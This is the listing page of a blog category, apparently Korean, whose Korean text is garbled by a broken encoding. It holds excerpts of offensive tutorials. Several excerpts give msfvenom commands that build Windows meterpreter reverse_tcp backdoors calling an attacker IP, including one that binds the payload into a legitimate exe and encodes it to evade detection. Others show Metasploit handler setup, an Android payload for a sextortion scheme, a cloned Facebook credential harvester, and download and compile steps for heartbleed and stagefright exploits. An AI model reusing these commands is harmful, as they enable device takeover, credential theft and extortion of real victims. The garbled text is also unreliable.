728x90 ๋ฐ์ํ Metasploit33 Hack windows XP with armitage in kali ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ service postgresql start ๋ช ๋ น์ด๋ฅผ ์คํ์ํจ ํ service metasploit start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ armitage๋ฅผ ์คํ์ํจ๋ค. ์ด๋ฌํ ์ฐฝ์ ๋ณผ์์์ ํ ๋ฐ connect๋ฅผ ๋๋ฅด๊ณ yes๋ฅผ ๋๋ฅด๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด ์~~ ์~~~ ๊ธฐ๋ค๋ฆฌ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. tab์ฐฝ์์ hosts -> add hosts ๋ฅผ ๋๋ฅด๋ฉด ์ด๋ ๊ฒ victim IP๋ฅผ ์ ๋ ฅํ ์์๋๋ก ๋ฌ๋ค. ๋ฑ๋กํ OS ๋ฅผ ์์๋ณด์ ๋ค์ host ํญ์์ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ๊ณ yes ๊ทธ๋ผ ์ฝ์์ฐฝ์ ์ด๋ฌํ ๊ฒ์ ํ์ธํ ์ ์๋ค. ์ด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉํ๊ธฐ ์ํด ์ด๋ ํ.. Metasploit 2016. 12. 23. Kali Linux by pass - Hack Windows metasploit tutorial ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. Hack windows with metasploit Java Applet JMX Remote Code Execution ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์ service apache2 startservice postgresql startservice metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค. ๊ทธ ํ msfconsole์ ํด์ค๋ค. ๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.) ๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค. ์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค. ๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง.. Metasploit 2016. 12. 22. Heartbleed :) ํํธ๋ธ๋ฆฌ๋ heartbleed ๋ 2015๋ ๋ณด์ ์ทจ์ฝ์ ์ค ๋ํ์ ์ธ ์ทจ์ฝ์ ์ด๋ผ ํ ์ ์๋ค. heartbleed ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ ์๋ฒ์ ๋ฉ๋ชจ๋ฆฌ์ ์ผ๋ถ๋ถ์ ์ฝ์ด ์ฌ ์ ์๋ openSSL์ ์ทจ์ฝ์ ์ผ๋ก ์์ฒญํ ๋ ์์ฒญํ ๋จ์ด๊ฐ ๋ง์ฝ aaa์ด๋ฉด 3๋ฐ์ดํธ๋ฅผ ์์ฒญํ๋ฉด ๋๋๋ฐ ์ด ๋ณด๋ค ๋ ํฐ ๋ฐ์ดํธ์ธ 500์ ํ๊ฒ ๋๋ค๋ฉด aaa๋ฅผ ๋ฐํํ๊ณ ๋จ์ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ๋ค๋ฅธ ๊ฐ์ผ๋ก ๋ฑ์ด ์ฃผ๋ ์ทจ์ฝ์ ์ ๋งํ๋ค. ์ทจ์ฝ์ ์ ์ค์ตํด๋ณผ ๋์๋ 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c์ฌ๊ธฐ์ ๋ค์ด์ ๋ฐ์ ํ 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21. netool ์ค์น๋ฐฉ๋ฒ(how to install netool) netool = script project ๋ทํด์ ์ค์นํ๊ธฐ ์ํด https://sourceforge.net/projects/netoolsh/ ๋ค์ด๊ฐ๋ฉด ๋ฐ์์ ๊ฐ์ ์ฐฝ์ด ๋ฌ๋ค. :) Git -> opensource-kali ๋ฅผ ํด๋ฆญํ๊ฒ ๋๋ฉด ๋ฐ์ผ๋ก ์ญ์ญ ๋ด๋ฆฌ๋ฉด ์ค์น๋ฐฉ๋ฒ์ด ๋ฌ๋น :) ์์ธํ๊ฑด ์ ํ๋ธ๋ก Metasploit/Kali & Backtrack 2016. 12. 16. ์์ฆ ์ ํ ํ๋ ๋ชธ์บ (๊ธฐ์ด๋ฐฉ์) ์์ฆ ๋ชธ์บ ์ด ์ ํ์ ํ์๋ค. ๋์ถฉ ์๋ฆฌ๋ฅผ ๋ณด๋ฉด ์ค์นดxx๊ฐ์ ๊ณณ์์ ์ฑํ ์ ํ๋ค๊ฐ ๋ชธ์บ ์ ํ์๊ณ ํ์ผ์ ๋ฐ์ผ๋ผ๊ณ ํ๋ค. (๋ชธ์บ ์ ํ๊ธฐ์ํ ์ ์ฉ ํ์ผ์ด๋ผ ๋ปฅ์ ์น๋ค.) ๊ทธ๋ฌ๊ณ ํ์ผ์ ๋ณด๋ด๋๋ฐ ๊ทธ ํ์ผ์ ๋น์ฐํ ์ ์ฑ์ฝ๋ !! :) ์ด์ ๊ทธ๊ฒ์ ์ฌ์ฐํด๋ณด์ ๊ทธ์ ์ ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.์์ํด๋ณด์ :X ๋จผ์ service apache2 start๋ก ์ํ์น๋ฅผ ์คํ ์์ผ์ฃผ๊ณ service postgresql start ๋ก postgresql ๋ํ ์ํจ๋ค. ๊ถ๊ทน์ ์ธ ๋ช ๋ น์ด service metasploit start ๋ก metasploit ๋ํ ์คํ์ํจ๋ค. ๊ทธ ํ ์ด์ ์ ์ฑ์ฝ๋๋ฅผ ๋ง๋ค์ด์ผ ํ๋๋ฐ...๋ช ๋ น์ด msfvenom์ ์ด์ฉ ํ์ฌ ๋ง๋ค์ด ๋ณด์.msfvenom -p android/meterpreter/.. Metasploit 2016. 12. 15. ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) ๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111 Metasploit 2016. 5. 24. ๊ฐ์ง facebook๋ง๋ค๊ธฐ ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo.. Metasploit 2016. 2. 11. stagefright.py ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. postgreSQL? postgreSQL??? service postgresql start Metasploit 2015. 12. 14. kali linux 2.0 apt-get /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free Metasploit/Kali & Backtrack 2015. 12. 10. msfvenom ์ฃผ์! ๋ชจ๋ ์ ์์ ์ธ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ํ ... ์๋ ์๋ msfpayload ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ๋ฐฑ๋์ด๋ ๋ง๋ค์ด ๋ณด๊ณ ํ๋ค.๊ทธ๋ฌ๋ ๋ฐ๋ผ๊ณ ๋ ํ ์ค๋๋ง์ ์จ์ผํด์ ๋ช ๋ น์ด๋ฅผ ํ๋ msfpayload๊ฐ ์๋ฐ์ฌ,,,๊ฒ์๊ฒฐ๊ณผ msfvenom ์ผ๋ก ๋ฐ๊ผ๊ธธ๋ ๋ค์ ๊ณต๋ถ๋ฅผ ํ์๋ค. ์ด์ ์ด๋ฅผ ๊ฐ๋จํ ์ฌ์ฉํด๋ณด์!๋จผ์ ๋ฆฌ์คํธ๋ฅผ ๋ณด๊ธฐ์ํด 1. msfvenom -l ์ด๋ ๊ฒ ๋ฆฌ์คํธ๊ฐ ๋์จ๋ค. ๋ง์ฝ ์๊ธฐ๊ฐ ์ฐ๊ณ ์ถ์ payload๋ฅผ ์ฐพ์๋ค๋ฉด 2. msfvenom -p ์ํ๋ payload -f ํ์ฅ์ > ํ์ผ์ด๋ฆ.ํ์ฅ์ root ํด๋์ ๊ฐ๋ฉด ํ์ผ์ด ์์ฑ๋์ด์๋ค. ์ด์ ํธ๋ค๋ฌ๋ฅผ ํฅํด!! 1. msfconsole 2. use exploit/multi/handler 3. sey payload [payload ๋ช ].. Metasploit 2015. 12. 6. ์ด์ 1 2 3 ๋ค์ 728x90 ๋ฐ์ํ